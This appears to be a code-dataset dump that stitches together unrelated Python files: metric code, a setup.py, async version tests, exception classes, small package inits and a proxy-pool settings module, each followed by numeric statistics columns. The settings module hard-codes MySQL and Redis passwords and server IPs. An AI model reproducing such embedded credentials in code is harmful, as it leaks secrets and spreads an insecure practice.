    Returns a sorted {bucket: [accuracy, n_samples, ci_low, ci_up, error_cases]}.
    """
    # The structure of span_true or span_pred
    # 2345|||Positive
    # 2345 represents sentence id
    # Positive represents the "label" of this instance
    dict_bucket2f1 = {}
    for bucket_interval, spans_true in dict_bucket2span.items():
        spans_pred = []
        # print('bucket_interval: ',bucket_interval)
        # Every gold bucket must also exist on the prediction side.
        if bucket_interval not in dict_bucket2span_pred.keys():
            #print(bucket_interval)
            raise ValueError("Predict Label Bucketing Errors")
        else:
            spans_pred = dict_bucket2span_pred[bucket_interval]
        # loop over samples from a given bucket
        error_case_bucket_list = []
        for info_true, info_pred in zip(spans_true, spans_pred):
            sid_true, label_true = info_true.split("|||")
            sid_pred, label_pred = info_pred.split("|||")
            # Only compare entries referring to the same sentence id.
            if sid_true != sid_pred:
                continue
            sent = dict_sid2sentpair[sid_true]
            if label_true != label_pred:
                error_case_info = sent
                error_case_bucket_list.append(error_case_info)
        accuracy_each_bucket = accuracy(spans_pred, spans_true)
        # print("debug: span_pred:\t")
        # print(spans_pred)
        confidence_low, confidence_up = compute_confidence_interval_acc(spans_pred, spans_true)
        dict_bucket2f1[bucket_interval] = [accuracy_each_bucket, len(spans_true), confidence_low, confidence_up, error_case_bucket_list]
        # print(error_case_bucket_list)
        print("accuracy_each_bucket:\t", accuracy_each_bucket)
    return sortDict(dict_bucket2f1)
| 27.631151
| 211
| 0.685751
| 8,742
| 61,203
| 4.479067
| 0.051247
| 0.024134
| 0.024671
| 0.026816
| 0.781719
| 0.749796
| 0.727143
| 0.712254
| 0.700352
| 0.694504
| 0
| 0.025964
| 0.177524
| 61,203
| 2,214
| 212
| 27.643631
| 0.751897
| 0.146055
| 0
| 0.666932
| 0
| 0.011924
| 0.034821
| 0.003201
| 0
| 0
| 0
| 0
| 0
| 1
| 0.062003
| false
| 0.000795
| 0.014308
| 0.00159
| 0.139905
| 0.054054
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
7439db78b8174742ff52526ef4f1e69a3e8a0f83
| 869
|
py
|
Python
|
setup.py
|
WenmuZhou/tablepyxl
|
3cb2a9e12b543bf46777b55bf64857281669fe98
|
[
"MIT"
] | 22
|
2017-01-06T17:27:53.000Z
|
2022-03-07T10:35:38.000Z
|
setup.py
|
WenmuZhou/tablepyxl
|
3cb2a9e12b543bf46777b55bf64857281669fe98
|
[
"MIT"
] | 14
|
2016-12-19T22:53:29.000Z
|
2021-12-13T19:44:11.000Z
|
setup.py
|
Wandrys-dev/tablepyxl
|
54bb89db70b184777074ea2badfb032ee10e6ab2
|
[
"MIT"
] | 17
|
2015-07-20T22:06:13.000Z
|
2021-06-15T13:41:01.000Z
|
from setuptools import setup, find_packages
# Distribution metadata for the tablepyxl package (HTML tables -> Excel).
setup(
    name='tablepyxl',
    version='0.6.1',
    description='Generate Excel documents from html tables',
    url='https://github.com/martsberger/tablepyxl',
    download_url='https://github.com/martsberger/tablepyxl/archive/0.6.1.tar.gz',
    author='Brad Martsberger, Asma Mehjabeen, Brian Davis',
    author_email='bmarts@lumere.com',
    license='MIT',
    # Supported interpreter versions (Python 2.7 and 3.4-3.7).
    classifiers=[
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7'
    ],
    packages=find_packages(),
    install_requires=['openpyxl', 'premailer', 'requests', 'lxml']
)
| 36.208333
| 81
| 0.639816
| 96
| 869
| 5.739583
| 0.552083
| 0.241379
| 0.317604
| 0.235935
| 0.134301
| 0.134301
| 0
| 0
| 0
| 0
| 0
| 0.026087
| 0.205984
| 869
| 23
| 82
| 37.782609
| 0.772464
| 0
| 0
| 0
| 1
| 0.045455
| 0.581128
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.045455
| 0
| 0.045455
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
7473252fb908a4341aee99ec7efd551dcb795f88
| 2,770
|
py
|
Python
|
tests/test_hassio.py
|
makefu/pyhaversion
|
adf4f237e47d7b3f62a52e6cf084824b20e9c1bb
|
[
"MIT"
] | null | null | null |
tests/test_hassio.py
|
makefu/pyhaversion
|
adf4f237e47d7b3f62a52e6cf084824b20e9c1bb
|
[
"MIT"
] | null | null | null |
tests/test_hassio.py
|
makefu/pyhaversion
|
adf4f237e47d7b3f62a52e6cf084824b20e9c1bb
|
[
"MIT"
] | null | null | null |
"""Tests for Hassio."""
import json
import aiohttp
import pytest
from pyhaversion import HassioVersion
from .const import (
HEADERS,
STABLE_VERSION,
STABLE_VERSION_BETA_WEEK,
BETA_VERSION,
BETA_VERSION_BETA_WEEK,
)
from .fixtures.fixture_hassio import (
hassio_response,
hassio_response_beta_week,
hassio_beta_response,
hassio_beta_response_beta_week,
)
@pytest.mark.asyncio
async def test_stable_version(aresponses, event_loop, hassio_response):
    """Test hassio stable."""
    # Mock the S3 stable-channel endpoint with the fixture payload.
    aresponses.add(
        "s3.amazonaws.com",
        "/hassio-version/stable.json",
        "get",
        aresponses.Response(
            text=json.dumps(hassio_response), status=200, headers=HEADERS
        ),
    )
    async with aiohttp.ClientSession(loop=event_loop) as session:
        haversion = HassioVersion(event_loop, session)
        await haversion.get_version()
        assert haversion.version == STABLE_VERSION
@pytest.mark.asyncio
async def test_beta_version(aresponses, event_loop, hassio_beta_response):
    """Test hassio beta."""
    # Mock the S3 beta-channel endpoint with the fixture payload.
    aresponses.add(
        "s3.amazonaws.com",
        "/hassio-version/beta.json",
        "get",
        aresponses.Response(
            text=json.dumps(hassio_beta_response), status=200, headers=HEADERS
        ),
    )
    async with aiohttp.ClientSession(loop=event_loop) as session:
        # "beta" selects the beta release channel.
        haversion = HassioVersion(event_loop, session, "beta")
        await haversion.get_version()
        assert haversion.version == BETA_VERSION
@pytest.mark.asyncio
async def test_stable_version_beta_week(
    aresponses, event_loop, hassio_response_beta_week
):
    """Test hassio stable during beta week."""
    # Mock the stable endpoint with the beta-week fixture payload.
    aresponses.add(
        "s3.amazonaws.com",
        "/hassio-version/stable.json",
        "get",
        aresponses.Response(
            text=json.dumps(hassio_response_beta_week), status=200, headers=HEADERS
        ),
    )
    async with aiohttp.ClientSession(loop=event_loop) as session:
        haversion = HassioVersion(event_loop, session)
        await haversion.get_version()
        assert haversion.version == STABLE_VERSION_BETA_WEEK
@pytest.mark.asyncio
async def test_beta_version_beta_week(
    aresponses, event_loop, hassio_beta_response_beta_week
):
    """Test hassio beta during beta week."""
    # Mock the beta endpoint with the beta-week fixture payload.
    aresponses.add(
        "s3.amazonaws.com",
        "/hassio-version/beta.json",
        "get",
        aresponses.Response(
            text=json.dumps(hassio_beta_response_beta_week), status=200, headers=HEADERS
        ),
    )
    async with aiohttp.ClientSession(loop=event_loop) as session:
        # "beta" selects the beta release channel.
        haversion = HassioVersion(event_loop, session, "beta")
        await haversion.get_version()
        assert haversion.version == BETA_VERSION_BETA_WEEK
| 28.556701
| 88
| 0.684116
| 316
| 2,770
| 5.759494
| 0.139241
| 0.061538
| 0.049451
| 0.048352
| 0.868132
| 0.781868
| 0.754945
| 0.718681
| 0.61978
| 0.61978
| 0
| 0.007394
| 0.218773
| 2,770
| 96
| 89
| 28.854167
| 0.833641
| 0.006137
| 0
| 0.545455
| 0
| 0
| 0.071838
| 0.03974
| 0
| 0
| 0
| 0
| 0.051948
| 1
| 0
| false
| 0
| 0.077922
| 0
| 0.077922
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
777158732d632ac14ea57da1212a1bc1484ac41e
| 38
|
py
|
Python
|
factual/common/exceptions.py
|
casebeer/factual
|
f2795a8c9fd447c5d62887ae0f960481ce13be84
|
[
"BSD-2-Clause"
] | 4
|
2015-01-02T01:16:52.000Z
|
2016-04-05T03:29:32.000Z
|
factual/common/exceptions.py
|
casebeer/factual
|
f2795a8c9fd447c5d62887ae0f960481ce13be84
|
[
"BSD-2-Clause"
] | null | null | null |
factual/common/exceptions.py
|
casebeer/factual
|
f2795a8c9fd447c5d62887ae0f960481ce13be84
|
[
"BSD-2-Clause"
] | null | null | null |
class FactualError(Exception):
    """Generic exception raised by the factual package."""
    pass
| 9.5
| 30
| 0.789474
| 4
| 38
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131579
| 38
| 3
| 31
| 12.666667
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
77938b3d81e6c77f7da1d074b11b49ed1c89eabe
| 107
|
py
|
Python
|
largescale/src/neuron/connection/connection/__init__.py
|
cosmozhang-lab/motion-illusion-model
|
32a5ccab920095818b220642bae491429ff71f27
|
[
"MIT"
] | null | null | null |
largescale/src/neuron/connection/connection/__init__.py
|
cosmozhang-lab/motion-illusion-model
|
32a5ccab920095818b220642bae491429ff71f27
|
[
"MIT"
] | null | null | null |
largescale/src/neuron/connection/connection/__init__.py
|
cosmozhang-lab/motion-illusion-model
|
32a5ccab920095818b220642bae491429ff71f27
|
[
"MIT"
] | null | null | null |
# Package: largescale.src.neuron.connection.connection
from connection import ConnectivityPool, Connection
| 35.666667
| 54
| 0.859813
| 11
| 107
| 8.363636
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074766
| 107
| 3
| 55
| 35.666667
| 0.929293
| 0.485981
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
77a918e079209fd67d3dc91b6148c893d38b03a8
| 33
|
py
|
Python
|
views/__init__.py
|
reganto/tornado
|
ea71bc9d91483d564f9a0faa3d5adf614b023603
|
[
"Apache-2.0"
] | 7
|
2018-07-12T19:51:57.000Z
|
2019-10-14T07:11:44.000Z
|
views/__init__.py
|
reganto/tornado
|
ea71bc9d91483d564f9a0faa3d5adf614b023603
|
[
"Apache-2.0"
] | 1
|
2019-08-02T14:16:40.000Z
|
2019-08-03T14:31:17.000Z
|
views/__init__.py
|
reganto/tornado
|
ea71bc9d91483d564f9a0faa3d5adf614b023603
|
[
"Apache-2.0"
] | null | null | null |
from .home import HomePageHandler
| 33
| 33
| 0.878788
| 4
| 33
| 7.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 33
| 1
| 33
| 33
| 0.966667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
77d36464bd4d49e3020b4c083cd21a208fedd75a
| 225
|
py
|
Python
|
misago/misago/graphql/admin/tests/conftest.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | 2
|
2021-03-06T21:06:13.000Z
|
2021-03-09T15:05:12.000Z
|
misago/misago/graphql/admin/tests/conftest.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | null | null | null |
misago/misago/graphql/admin/tests/conftest.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | null | null | null |
import pytest
from django.urls import reverse
from ...test import GraphQLTestClient
@pytest.fixture
def admin_graphql_client(admin_client):
    """Return a GraphQLTestClient bound to the admin GraphQL endpoint."""
    return GraphQLTestClient(admin_client, reverse("misago:admin:graphql:index"))
| 22.5
| 81
| 0.813333
| 28
| 225
| 6.392857
| 0.571429
| 0.134078
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102222
| 225
| 9
| 82
| 25
| 0.886139
| 0
| 0
| 0
| 0
| 0
| 0.115556
| 0.115556
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.5
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 5
|
77f7c60ba8c49ec29ff69b45928966af5755a776
| 153
|
py
|
Python
|
video_classification/models/__init__.py
|
gpostelnicu/video_classification
|
ac8cf0b1a3365ec42ec92fd8b3ad946c6e5c8e15
|
[
"MIT"
] | null | null | null |
video_classification/models/__init__.py
|
gpostelnicu/video_classification
|
ac8cf0b1a3365ec42ec92fd8b3ad946c6e5c8e15
|
[
"MIT"
] | null | null | null |
video_classification/models/__init__.py
|
gpostelnicu/video_classification
|
ac8cf0b1a3365ec42ec92fd8b3ad946c6e5c8e15
|
[
"MIT"
] | null | null | null |
from .decoder import Decoder
from .encoder import ResnetEncoder
from .factory import get_model_by_name
from .resnet_lstm import ResnetLstm, count_params
| 30.6
| 49
| 0.856209
| 22
| 153
| 5.727273
| 0.681818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 153
| 4
| 50
| 38.25
| 0.926471
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
ae01fc6a56fdee3f32c2f3e77c8b72e91dcc1d0a
| 2,693
|
py
|
Python
|
proxypool/proxypool/proxypool/LosmliProxyPool/settings/default_settings.py
|
yhr-git/study_git
|
b509dcc2195c8fab02d4c16a9299f6ba26a192e8
|
[
"MIT"
] | null | null | null |
proxypool/proxypool/proxypool/LosmliProxyPool/settings/default_settings.py
|
yhr-git/study_git
|
b509dcc2195c8fab02d4c16a9299f6ba26a192e8
|
[
"MIT"
] | null | null | null |
proxypool/proxypool/proxypool/LosmliProxyPool/settings/default_settings.py
|
yhr-git/study_git
|
b509dcc2195c8fab02d4c16a9299f6ba26a192e8
|
[
"MIT"
] | null | null | null |
import os

# Project root: two levels above this settings module.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# User-Agent strings rotated when crawling proxy sources.
USER_AGENTS_LIST = [
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'
]

# First validation pass after crawling a proxy.
HTTPBIN_CHECK_URL = 'http://httpbin.org/ip'
# CHECK_URL = 'https://www.google.com/'
# CHECK_URL = 'https://www.alibaba.com/'

# Verify proxy availability against a specific target site.
AMAZON_CHECK_URL = 'https://www.amazon.com/'

# Proxy filtering: this host's own IP.
CLIENT_IP = '172.105.220.160'

# MySQL configuration.
# NOTE(review): credentials are hard-coded in source — move to environment
# variables or a secrets store.
MYSQL_HOST = '172.105.220.160'
MYSQL_PORT = 3306
MYSQL_USER = 'root'
MYSQL_PASSWORD = 'hb_root123456'
MYSQL_DB = 'proxypool'

# Redis configuration.
REDIS_HOST = '172.105.220.160'
REDIS_PORT = 6379
REDIS_PASSWORD = 'hb_root123456'
REDIS_DB = 1

# Redis keys for the proxy check queues/result sets.
PROXY_WAIT_CHECK_HTTPBIN = 'proxyWaitCheckHttpbin'
PROXY_IS_VAILD_HTTPBIN = 'proxyIsVaildHttpbin'
PROXY_WAIT_CHECK_AMAZON = 'proxyWaitCheckAmazon'
PROXY_IS_VAILD_AMAZON = 'proxyIsVaildAmazon'

# Maximum number of concurrent checks.
MAX_CONCURRENT = 50

PROXY_FILE = os.path.join(BASE_DIR, 'list.txt')
| 47.245614
| 122
| 0.717044
| 467
| 2,693
| 4.049251
| 0.229122
| 0.079323
| 0.071391
| 0.126917
| 0.678477
| 0.644632
| 0.644632
| 0.644632
| 0.644632
| 0.625595
| 0
| 0.203138
| 0.124397
| 2,693
| 56
| 123
| 48.089286
| 0.598813
| 0.051244
| 0
| 0
| 0
| 0.405405
| 0.753635
| 0.008251
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.054054
| 0.027027
| 0
| 0.027027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
7af0ca5f9ba1d7ef7209dbd8ee8cdbc2d3865c16
| 250
|
py
|
Python
|
classifier/models/effnet.py
|
bendikbo/SSED
|
fdd0e74d419687bc8cba65341d7248ca6ccd1a4e
|
[
"MIT"
] | null | null | null |
classifier/models/effnet.py
|
bendikbo/SSED
|
fdd0e74d419687bc8cba65341d7248ca6ccd1a4e
|
[
"MIT"
] | null | null | null |
classifier/models/effnet.py
|
bendikbo/SSED
|
fdd0e74d419687bc8cba65341d7248ca6ccd1a4e
|
[
"MIT"
] | null | null | null |
#The effcientnet_pytorch package is licensed under LGPL V3
#License can be found in the subdir "LICENSES"
from efficientnet_pytorch import EfficientNet
def effnet(cfg):
    """Build a pretrained EfficientNet classifier from the model config.

    cfg must provide NAME (EfficientNet variant id, e.g. an
    "efficientnet-bN" string) and NUM_CLASSES (output class count).
    """
    return EfficientNet.from_pretrained(cfg.NAME, num_classes=cfg.NUM_CLASSES)
| 31.25
| 78
| 0.82
| 36
| 250
| 5.555556
| 0.75
| 0.1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004566
| 0.124
| 250
| 7
| 79
| 35.714286
| 0.908676
| 0.408
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 5
|
bb4d1d4ec712336b542134fc4df6127ae0b6abc7
| 80
|
py
|
Python
|
server/log.py
|
codingchili/lifx-circadian
|
511488681c0745fd2c3122354ea0451d1a64fff8
|
[
"MIT"
] | 2
|
2020-01-14T12:31:05.000Z
|
2022-01-06T17:24:14.000Z
|
server/log.py
|
codingchili/lifx-circadian
|
511488681c0745fd2c3122354ea0451d1a64fff8
|
[
"MIT"
] | 14
|
2019-11-21T17:55:12.000Z
|
2019-12-01T20:15:26.000Z
|
server/log.py
|
codingchili/lifx-circadian
|
511488681c0745fd2c3122354ea0451d1a64fff8
|
[
"MIT"
] | null | null | null |
import time
def log(line):
    """Print *line* prefixed with the current HH:MM:SS timestamp."""
    print(f"{time.strftime('%H:%M:%S')} > {line}")
| 16
| 51
| 0.55
| 12
| 80
| 3.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 80
| 5
| 51
| 16
| 0.6875
| 0
| 0
| 0
| 0
| 0
| 0.135802
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
2475b817ccae80859885a1e431d955da7858cfb0
| 534
|
py
|
Python
|
tests/test_subscriptableclass_approach.py
|
mjendersgyg/TypedPyspark
|
cf58624bceb2b2e122b8cb24901453c98efd2356
|
[
"Apache-2.0"
] | 3
|
2021-12-09T08:58:57.000Z
|
2022-02-03T12:53:55.000Z
|
tests/test_subscriptableclass_approach.py
|
mjendersgyg/TypedPyspark
|
cf58624bceb2b2e122b8cb24901453c98efd2356
|
[
"Apache-2.0"
] | null | null | null |
tests/test_subscriptableclass_approach.py
|
mjendersgyg/TypedPyspark
|
cf58624bceb2b2e122b8cb24901453c98efd2356
|
[
"Apache-2.0"
] | 1
|
2022-03-28T12:43:18.000Z
|
2022-03-28T12:43:18.000Z
|
from pyspark.sql import SparkSession
from typed_pyspark import DataFrame
phone = str
url = str
def test_with_spark():
    """Exercise a subscripted DataFrame annotation against a real Spark DataFrame."""
    # DataFrame["phone", "url", ...] builds a subscripted type — presumably
    # the "..." allows extra columns; confirm against typed_pyspark.
    df_names = DataFrame["phone", "url", ...]
    spark = SparkSession.builder.getOrCreate()
    df = spark.createDataFrame([{"phone": "1233125"}])
    # Annotated inner function: identity passthrough of the DataFrame.
    def test(df: df_names) -> DataFrame["phone", "url"]:
        return df
    test(df)
def test_first():
    """Exercise subscripted DataFrame annotations without a Spark session."""
    df_names = DataFrame["phone", "url", ...]
    # Annotated inner function returning a fresh (empty) DataFrame.
    def test(df: df_names) -> DataFrame["phone", "url"]:
        return DataFrame()
    test(DataFrame())
| 19.777778
| 56
| 0.632959
| 64
| 534
| 5.15625
| 0.34375
| 0.212121
| 0.193939
| 0.254545
| 0.381818
| 0.236364
| 0.236364
| 0.236364
| 0.236364
| 0
| 0
| 0.016548
| 0.207865
| 534
| 26
| 57
| 20.538462
| 0.763593
| 0
| 0
| 0.25
| 0
| 0
| 0.082397
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.125
| 0.125
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 5
|
2477f7f753604e256b5a37a04aeba572c0063501
| 256
|
py
|
Python
|
discounts/src/exceptions/exceptions.py
|
dalmarcogd/mobstore
|
0b542b9267771a1f4522990d592028dc30ee246f
|
[
"Apache-2.0"
] | null | null | null |
discounts/src/exceptions/exceptions.py
|
dalmarcogd/mobstore
|
0b542b9267771a1f4522990d592028dc30ee246f
|
[
"Apache-2.0"
] | null | null | null |
discounts/src/exceptions/exceptions.py
|
dalmarcogd/mobstore
|
0b542b9267771a1f4522990d592028dc30ee246f
|
[
"Apache-2.0"
] | null | null | null |
class UserNotFoundException(Exception):
    """Raised when a referenced user cannot be found."""
    pass
class ProductNotFoundException(Exception):
    """Raised when a referenced product cannot be found."""
    pass
class UnrecognizedEventType(Exception):
    """Raised for an event whose type is not recognized."""
    pass
class UnrecognizedEventOperation(Exception):
    """Raised for an event whose operation is not recognized."""
    pass
class UnrecognizedArgs(Exception):
    """Raised when arguments are not recognized."""
    pass
| 13.473684
| 44
| 0.773438
| 20
| 256
| 9.9
| 0.4
| 0.328283
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.167969
| 256
| 18
| 45
| 14.222222
| 0.929577
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
2480d38d361ab252237b6e4282cde75fed35e477
| 162
|
py
|
Python
|
netmiko/alliedtelesis/__init__.py
|
Rawrroar/netmiko
|
5477580e168f79571920b61e718d0a8781b39dbb
|
[
"MIT"
] | null | null | null |
netmiko/alliedtelesis/__init__.py
|
Rawrroar/netmiko
|
5477580e168f79571920b61e718d0a8781b39dbb
|
[
"MIT"
] | null | null | null |
netmiko/alliedtelesis/__init__.py
|
Rawrroar/netmiko
|
5477580e168f79571920b61e718d0a8781b39dbb
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from netmiko.alliedtelesis.awplus_ssh import AWplusSSH, AWplusFileTransfer

# Public API of the alliedtelesis vendor package.
__all__ = ["AWplusSSH", "AWplusFileTransfer"]
| 32.4
| 74
| 0.845679
| 16
| 162
| 7.9375
| 0.75
| 0.425197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08642
| 162
| 4
| 75
| 40.5
| 0.858108
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
249adc4109ce80d8c4201dd89380eab313ed0ea9
| 119
|
py
|
Python
|
insomniac/extra_features/action_register_accounts.py
|
chikko80/Insomniac
|
